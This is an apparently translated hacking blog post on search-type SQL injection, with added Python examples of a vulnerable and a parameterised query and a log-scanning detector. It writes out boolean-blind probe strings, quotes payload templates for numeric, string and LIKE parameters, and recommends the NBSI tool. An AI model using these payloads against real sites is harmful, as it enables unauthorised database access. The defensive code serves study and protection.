SoFunction
Updated on 2025-04-10

Search type injection I think --- Injection is inseparable

Updated: January 16, 2007
Today I saw an article about search-type injection that uses a new technique, demonstrated with a search for "Samsung":

The injection method is:

Generally, searches on websites use partial (LIKE) matching.
The vulnerable URL is /news/?page=1&type=product&ST=title&SC=
Construct the two injection statements:
Samsung %'and 1=1 and '%'='
Samsung %'and 1=2 and '%'='

You can see that the two returned pages differ, which indicates that an injection vulnerability exists. The feature word (the text that appears only on the "true" page, "notebook" in this example) is present for Samsung %'and 1=1 and '%'='
We know that search code is written like this:

Select * from Table name where field like '%keyword%'

This matches anything before and after the keyword (% is the wildcard that matches any string).

If the keyword is not filtered here, you can construct it like this:

Keyword =' and [Query Condition] and '%25'='

(%25 is the URL encoding of %.) The query then becomes:

select * from Table name where field like '%' and 1=1 and '%'='%'

This makes a very good SQL injection point. Of course, it can be done by hand, and it can also be done with NBSI~~
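As an added example (not code from the original post), here is the search query the text describes, written in Python against an in-memory SQLite table with constructed rows, alongside a hardened form that binds the keyword as a parameter and escapes the LIKE wildcards. The table name `news`, the column `title` and the sample rows are assumptions made for this example.

```python
import sqlite3

# Constructed sample data standing in for the page's "Table name" / "field".
SAMPLE_ROWS = [
    ("Samsung notebook review", "product"),
    ("Samsung phone launch", "product"),
    ("Dell notebook review", "product"),
]


def make_db():
    """Build a throwaway in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (title TEXT, type TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, keyword):
    """The pattern the page describes: the keyword is pasted into the SQL text."""
    # A closing quote inside `keyword` ends the LIKE pattern, and whatever follows
    # becomes part of the WHERE clause: like '%keyword%' -> like '%' and ... and '%'='%'
    sql = "SELECT title FROM news WHERE title LIKE '%" + keyword + "%' ORDER BY rowid"
    return [row[0] for row in conn.execute(sql)]


def escape_like(keyword, escape_char="\\"):
    """Escape LIKE metacharacters so the user's text is matched literally."""
    return (keyword.replace(escape_char, escape_char * 2)
                   .replace("%", escape_char + "%")
                   .replace("_", escape_char + "_"))


def search_hardened(conn, keyword):
    """Bound parameter: the keyword is data, never SQL text."""
    # The application adds the wildcards itself; a % or _ typed by the user is
    # escaped, so it cannot widen the match, and a quote cannot end the pattern.
    pattern = "%" + escape_like(keyword) + "%"
    sql = "SELECT title FROM news WHERE title LIKE ? ESCAPE '\\' ORDER BY rowid"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    conn = make_db()
    probe = "Samsung %'and 1=2 and '%'='"
    print("vulnerable:", search_vulnerable(conn, probe))   # empty: the 1=2 clause is evaluated
    print("hardened:  ", search_hardened(conn, probe))     # empty too, but only because no title contains that literal text
    print("hardened:  ", search_hardened(conn, "Samsung")) # normal search still works
```

With the vulnerable function the two probes from the page return different result sets (the 1=1 form returns every Samsung row, the 1=2 form returns nothing), which is exactly the page-difference the article uses as its indicator; with the bound parameter both probes are just literal text that matches no title, and a plain keyword still searches as before.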

Injection is all one thing; there is no need for a separate "type" of injection! ~

If you don't believe it, read the original words of the "SQL Injection Heavenly Book" below:

Section 1: General steps of SQL injection

First, judge the environment, find the injection point, and judge the database type; this has been discussed in the introductory chapter.

Secondly, according to the type of the injected parameter, reconstruct the original form of the SQL statement in your mind. The parameter types mainly fall into the following three kinds:

(A) ID=49 The injected parameter in this type is numeric, and the original form of the SQL statement is roughly as follows:
Select * from Table name where field=49
The injected parameter is ID=49 And [Query condition], that is, the generated statement is:
Select * from Table name where field=49 And [Query condition]

(B) Class=Serial The injected parameter in this type is a character string, and the original form of the SQL statement is roughly as follows:
Select * from Table name where field='Serial'
The injected parameter is Class=Serial' and [Query condition] and ''=', that is, the generated statement is:
Select * from Table name where field='Serial' and [Query condition] and ''=''

(C) If the search parameter is not filtered, such as keyword=keyword, the original form of the SQL statement is roughly as follows:
Select * from Table name where field like '%keyword%'
The injected parameter is keyword=' and [Query condition] and '%25'=', that is, the generated statement is:
Select * from Table name where field like '%' and [Query condition] and '%'='%'
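To turn the three parameter shapes above into something a defender can act on, here is an added example (not from the original post or from the quoted book) that scans constructed web-server access-log lines, URL-decodes each query-string parameter, and flags values that match the numeric, string and search-type shapes just listed. The log lines, paths and parameter names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the page). Only the request target is inspected.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2007:10:01:02 +0800] "GET /news/?page=1&type=product&ST=title&SC=Samsung HTTP/1.1" 200 5120
10.0.0.5 - - [16/Jan/2007:10:01:09 +0800] "GET /news/?page=1&type=product&ST=title&SC=Samsung+%25%27and+1%3D1+and+%27%25%27%3D%27 HTTP/1.1" 200 5120
10.0.0.5 - - [16/Jan/2007:10:01:15 +0800] "GET /news/?page=1&type=product&ST=title&SC=Samsung+%25%27and+1%3D2+and+%27%25%27%3D%27 HTTP/1.1" 200 1830
10.0.0.7 - - [16/Jan/2007:10:02:30 +0800] "GET /show.asp?ID=49 HTTP/1.1" 200 3020
10.0.0.7 - - [16/Jan/2007:10:02:41 +0800] "GET /show.asp?ID=49+and+1%3D1 HTTP/1.1" 200 3020
10.0.0.9 - - [16/Jan/2007:10:03:00 +0800] "GET /list.asp?Class=Serial%27+and+1%3D1+and+%27%27%3D%27 HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# One pattern per parameter type from the excerpt above, applied to the decoded value.
PATTERNS = {
    # (A) numeric: a number followed directly by an AND clause, e.g. "49 and 1=1"
    "numeric": re.compile(r"^\d+\s+and\s+", re.IGNORECASE),
    # (B) string: close the quote, add a condition, re-balance the quotes with ''='
    "string": re.compile(r"'\s*and\s+.*\band\s+''\s*=\s*'$", re.IGNORECASE),
    # (C) search: same idea, re-balanced with '%'=' so the LIKE wildcards line up
    "search": re.compile(r"'\s*and\s+.*\band\s+'%'\s*=\s*'$", re.IGNORECASE),
}


def classify_value(value):
    """Return the injection shape a decoded parameter value matches, or None."""
    for kind, pattern in PATTERNS.items():
        if pattern.search(value):
            return kind
    return None


def scan_log(text):
    """Return (line_number, parameter_name, kind) for every suspicious parameter."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl decodes %xx escapes and '+', so the value is inspected as the server sees it
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append((line_no, name, kind))
    return findings


if __name__ == "__main__":
    for line_no, name, kind in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter {name!r} looks like {kind}-type injection")
```

Decoding before matching matters: in the raw log the search payload appears as `%25%27and+1%3D1`, so a pattern written against the decoded SQL text would never fire on the encoded form. The same decoded value is what the application concatenates into its query, which is why the three shapes map one-to-one onto the three statement forms in the excerpt.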


Of course, doing it by hand is troublesome.

If you use tools, I suggest NBSI is the better choice. I feel that only NBSI has incorporated this technique; other software can't inject here.

For the injection point, just write:

/news/?page=1&type=product&ST=title&SC=%

Then just add a feature word.